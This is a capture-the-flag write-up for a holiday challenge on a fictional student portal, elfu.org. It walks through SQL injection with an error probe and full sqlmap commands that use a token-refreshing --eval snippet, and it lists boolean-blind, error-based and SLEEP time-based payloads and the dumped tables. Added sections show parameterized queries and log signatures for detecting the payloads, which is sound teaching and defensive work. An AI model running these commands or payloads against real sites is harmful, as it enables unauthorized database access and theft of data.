# 9. Retrieve Scraps of Paper from Server

Difficulty: 4/5

## Info & Hints
Retrieve Scraps of Paper from Server
Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there.
What is the name of Santa's cutting-edge sleigh guidance system?
For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.
Pepper Minstix:
That's it - hooray!
Have you had any luck retrieving scraps of paper from the Elf U server?
You might want to look into SQL injection techniques.
OWASP is always a good resource for web attacks.
For blind SQLi, I've heard Sqlmap is a great tool.
In certain circumstances though, you need custom tamper scripts to get things going!
Hints:

- SQL Injection
- SQLMap Tamper Scripts
## Solution

### Understand the backend
When you visit the student portal you will find two forms: one for submitting an application and one for checking the status of an application.

Let's go with the [Check Application Status](https://studentportal.elfu.org/check.php) page to probe the database.

The form sends a GET request to https://studentportal.elfu.org/application-check.php with the email and a token:
If we look at the check.php page source, we can see that the token is a hidden form field that is filled in by JavaScript, which fetches it from validator.php just before the form is submitted:

```html
<input type="hidden" id="token" name="token" value=""/>
```

```javascript
function submitApplication() {
  console.log("Submitting");
  elfSign();
  document.getElementById("check").submit();
}

function elfSign() {
  var s = document.getElementById("token");
  const Http = new XMLHttpRequest();
  const url = '/validator.php';
  // Synchronous GET: the token is fetched and stored in the hidden field before submit().
  Http.open("GET", url, false);
  Http.send(null);
  if (Http.status === 200) {
    console.log(Http.responseText);
    s.value = Http.responseText;
  }
}
```
Visit validator.php and refresh it three or four times. Every visit returns a new token, which indicates that it is a time-based, one-time-use token:

```
MTAxMDMyNTA4NTQ0MTU3ODYzMjk0NjEwMTAzMjUwOC41NDQ=_MTI5MzIxNjEwOTM2MzIzMjMzMDQwMjczLjQwOA==
MTAxMDMyNTA3NjQ4MTU3ODYzMjkzMjEwMTAzMjUwNy42NDg=_MTI5MzIxNjA5Nzg5NDQzMjMzMDQwMjQ0LjczNg==
MTAxMDMyNTA3OTY4MTU3ODYzMjkzNzEwMTAzMjUwNy45Njg=_MTI5MzIxNjEwMTk5MDQzMjMzMDQwMjU0Ljk3Ng==
```
### SQL Injection
Let's try to inject into the query to compromise the database. Send a single quote (`'`) as the email input and look at the error the database returns:

```
ERROR
Error: SELECT status FROM applications WHERE elfmail = ''';
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1
```

We get valuable information: the query text and the `applications` table name, and the DBMS is MariaDB.
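The error above is what string concatenation into a query looks like from the outside. As an added illustration (not part of the original write-up), the snippet below rebuilds the leaked query shape in both its vulnerable and its parameterized form and runs the page's own probe strings against them. SQLite stands in for MariaDB, the table rows are constructed, and `make_db`, `probe` and the two `check_status_*` functions are names chosen for this example.

```python
import sqlite3

# Constructed stand-in for the portal's `applications` table; the leaked error
# only tells us the table name and the `elfmail` / `status` columns it uses.
SAMPLE_ROWS = [
    ("alabaster@elfu.org", "accepted"),
    ("shinny@elfu.org", "pending"),
]

# The boolean-based payload sqlmap reported for this page (with a valid address
# in front of it) and its "false" twin, used to show how inference works.
TRUE_PAYLOAD = "alabaster@elfu.org' AND 1817=1817 AND 'VsQU'='VsQU"
FALSE_PAYLOAD = "alabaster@elfu.org' AND 1817=1818 AND 'VsQU'='VsQU"


def make_db():
    """In-memory SQLite database holding the sample rows (SQLite stands in for MariaDB)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE applications (elfmail TEXT, status TEXT)")
    conn.executemany("INSERT INTO applications VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def check_status_vulnerable(conn, elfmail):
    """The query shape the error page leaks, built by string concatenation.

    A quote in the input terminates the string literal, so the rest of the
    input is parsed as SQL: a lone quote is a syntax error, a crafted tail
    is executed as part of the WHERE clause.
    """
    sql = "SELECT status FROM applications WHERE elfmail = '" + elfmail + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def check_status_safe(conn, elfmail):
    """Same lookup with a bound parameter: the value never becomes SQL text."""
    row = conn.execute(
        "SELECT status FROM applications WHERE elfmail = ?", (elfmail,)
    ).fetchone()
    return row[0] if row else None


def probe(lookup, conn, elfmail):
    """Run a lookup and report what a tester observes: a result or a DB error."""
    try:
        return ("ok", lookup(conn, elfmail))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    for label, value in [("normal", "alabaster@elfu.org"), ("quote", "'"),
                         ("true", TRUE_PAYLOAD), ("false", FALSE_PAYLOAD)]:
        print(f"{label:>6}: vulnerable={probe(check_status_vulnerable, conn, value)} "
              f"safe={probe(check_status_safe, conn, value)}")
```

The vulnerable lookup errors on the lone quote and answers the true/false pair differently (a row for 1817=1817, nothing for 1817=1818), which is exactly the oracle boolean-based blind injection relies on. The parameterized lookup treats every one of those strings as a literal mail address that simply does not exist. The second fix the portal needs is visible in the page's own screenshot: the raw DBMS error was echoed to the user, which is what handed over the table name, so database exceptions should be logged server-side and answered with a generic message.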
Let's use the sqlmap tool to automate the injection and retrieve the data.

- Download the tool from its release page or clone it with git:

  ```shell
  git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
  ```

- Every request needs a fresh token, so we use a small piece of Python code with sqlmap's `--eval` option. The snippet makes a GET request to validator.php, retrieves the token and stores it in the variable `token`, which sqlmap substitutes into the `token` parameter of each request:

  ```python
  import requests
  r = requests.get('https://studentportal.elfu.org/validator.php')
  token = r.text
  ```

  You will need to install the requests package:

  ```shell
  pip3 install requests
  ```
- sqlmap commands:

  - Let's start by testing the parameter for injection:

    ```shell
    python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" -v 4
    ```

    - `-u`: the URL of the page that talks to the targeted database.
    - `-p`: the parameter to test.
    - `--dbms=MariaDB`: set the DBMS type.
    - `--eval=EVALCODE`: evaluate the provided Python code before each request.
    - `-v`: set the verbosity level of output messages.

    ```
    sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:
    ---
    Parameter: elfmail (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: elfmail=1' AND 1817=1817 AND 'VsQU'='VsQU&token=1
        Vector: AND [INFERENCE]

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: elfmail=1' AND (SELECT 6257 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(6257=6257,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kcsP'='kcsP&token=1
        Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: elfmail=1' AND (SELECT 2136 FROM (SELECT(SLEEP(5)))DMUR) AND 'eZch'='eZch&token=1
        Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
    ---
    ```
  - Now let's enumerate the databases:

    ```shell
    python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --dbs -v 4
    ```

    - `--dbs`: enumerate the DBMS databases.

    ```
    available databases [2]:
    [*] elfu
    [*] information_schema
    ```
  - Get the tables of the `elfu` database:

    ```shell
    python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --tables -v 4 -D elfu
    ```

    - `--tables`: enumerate the tables of a database.
    - `-D DB`: the database to enumerate.

    ```
    Database: elfu
    [3 tables]
    +--------------+
    | applications |
    | krampus      |
    | students     |
    +--------------+
    ```

    The tables look interesting. Let's focus on `students` and `krampus`, because the `applications` table will be full of the test queries everyone has submitted!

  - Dump the `students` and `krampus` tables:

    ```shell
    python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" -v 4 -D elfu -T "krampus,students" --dump
    ```

    - `-T`: the table(s) to enumerate.
    - `--dump`: dump the table entries.

    ```
    Database: elfu
    Table: krampus
    [6 entries]
    +----+-----------------------+
    | id | path                  |
    +----+-----------------------+
    | 1  | /krampus/0f5f510e.png |
    | 2  | /krampus/1cc7e121.png |
    | 3  | /krampus/439f15e6.png |
    | 4  | /krampus/667d6896.png |
    | 5  | /krampus/adb798ca.png |
    | 6  | /krampus/ba417715.png |
    +----+-----------------------+
    ```

    The results are also saved as CSV files in the `.sqlmap/output/studentportal.elfu.org` folder in your home directory.
  - Alternative method: we can test for injection and dump all the tables with a single command, but it takes longer:

    ```shell
    python3 sqlmap.py -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=1" -p elfmail --dbms=MariaDB --eval="import requests; r = requests.get('https://studentportal.elfu.org/validator.php');token = r.text;" --dump
    ```
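Seen from the server side, the run above leaves a distinctive trail in the web server's access log: a burst of `application-check.php` lookups from one address whose `elfmail` values contain quotes and SQL. The following added example (not part of the write-up) runs signature checks over constructed Apache-style log lines that carry the three payloads sqlmap reported for this parameter. The log lines, client addresses and token values are constructed, and `parse_line`, `classify` and `analyze` are names chosen for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log. 10.0.0.5 is a normal user; 10.0.0.9 sends
# the three payloads sqlmap reported, each preceded by the validator.php fetch
# that the --eval snippet performs to obtain a fresh token.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2020:05:09:06 +0000] "GET /check.php HTTP/1.1" 200 1034
10.0.0.5 - - [10/Jan/2020:05:09:09 +0000] "GET /validator.php HTTP/1.1" 200 90
10.0.0.5 - - [10/Jan/2020:05:09:10 +0000] "GET /application-check.php?elfmail=alabaster%40elfu.org&token=T1 HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2020:05:10:01 +0000] "GET /validator.php HTTP/1.1" 200 90
10.0.0.9 - - [10/Jan/2020:05:10:01 +0000] "GET /application-check.php?elfmail=1%27%20AND%201817%3D1817%20AND%20%27VsQU%27%3D%27VsQU&token=T2 HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2020:05:10:02 +0000] "GET /validator.php HTTP/1.1" 200 90
10.0.0.9 - - [10/Jan/2020:05:10:02 +0000] "GET /application-check.php?elfmail=1%27%20AND%20(SELECT%202136%20FROM%20(SELECT(SLEEP(5)))DMUR)%20AND%20%27eZch%27%3D%27eZch&token=T3 HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2020:05:10:08 +0000] "GET /validator.php HTTP/1.1" 200 90
10.0.0.9 - - [10/Jan/2020:05:10:08 +0000] "GET /application-check.php?elfmail=1%27%20AND%20(SELECT%206257%20FROM(SELECT%20COUNT(*)%2CCONCAT(0x7171787671%2C(SELECT%20(ELT(6257%3D6257%2C1)))%2C0x716a6b6271%2CFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27kcsP%27%3D%27kcsP&token=T4 HTTP/1.1" 500 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \d+$'
)

# Signatures for the three techniques sqlmap reported, plus a catch-all for a
# quote character, which a mail address never legitimately contains.
SIGNATURES = [
    ("boolean-blind", re.compile(r"'\s*AND\s+\d+\s*=\s*\d+", re.I)),
    ("time-blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(|INFORMATION_SCHEMA", re.I)),
    ("quote", re.compile(r"'")),
]


def parse_line(line):
    """Return ip, timestamp, path, status and the URL-decoded elfmail value (or None)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query)  # parse_qs also percent-decodes the values
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "status": int(m.group("status")),
        "elfmail": params.get("elfmail", [None])[0],
    }


def classify(value):
    """List the signature labels that match a decoded elfmail value."""
    if value is None:
        return []
    return [label for label, rx in SIGNATURES if rx.search(value)]


def analyze(log_text):
    """Flag injection-looking lookups and count lookups per client address."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev or ev["path"] != "/application-check.php":
            continue
        per_ip[ev["ip"]] += 1
        labels = classify(ev["elfmail"])
        if labels:
            findings.append({"ip": ev["ip"], "ts": ev["ts"], "labels": labels,
                             "elfmail": ev["elfmail"]})
    return {"findings": findings, "lookups_per_ip": dict(per_ip)}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for f in report["findings"]:
        print(f["ts"], f["ip"], ",".join(f["labels"]), repr(f["elfmail"][:40]))
    print("lookups per IP:", report["lookups_per_ip"])
```

Two things are worth noting when turning this into a real detection. The validator.php-then-application-check.php pairing is not a signal on its own, because the legitimate `elfSign()` flow produces exactly the same pair for every human submission; what stands out is the volume (sqlmap needed 67 requests just to confirm the injection point) combined with quote-bearing values. And because the token is fetched per request, a one-time token only defeats naive replay, not an attacker who scripts the token fetch, so it is no substitute for parameterized queries on the server.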
### Retrieve the paper scraps

Using the paths we retrieved from the `krampus` table we can now fetch all the scraps, which the objective tells us are hosted on the student portal:

- https://studentportal.elfu.org/krampus/0f5f510e.png
- https://studentportal.elfu.org/krampus/1cc7e121.png
- https://studentportal.elfu.org/krampus/439f15e6.png
- https://studentportal.elfu.org/krampus/667d6896.png
- https://studentportal.elfu.org/krampus/adb798ca.png
- https://studentportal.elfu.org/krampus/ba417715.png
The name of Santa's cutting-edge sleigh guidance system:

super sled-o-matic

Congratulations! You have completed the Retrieve Scraps of Paper from Server challenge!
## What you've learned

- Using SQL injection to trigger errors that expose information about the database.
- Automating SQL injection with sqlmap.
- Evaluating Python code before each request from the sqlmap command line (`--eval`).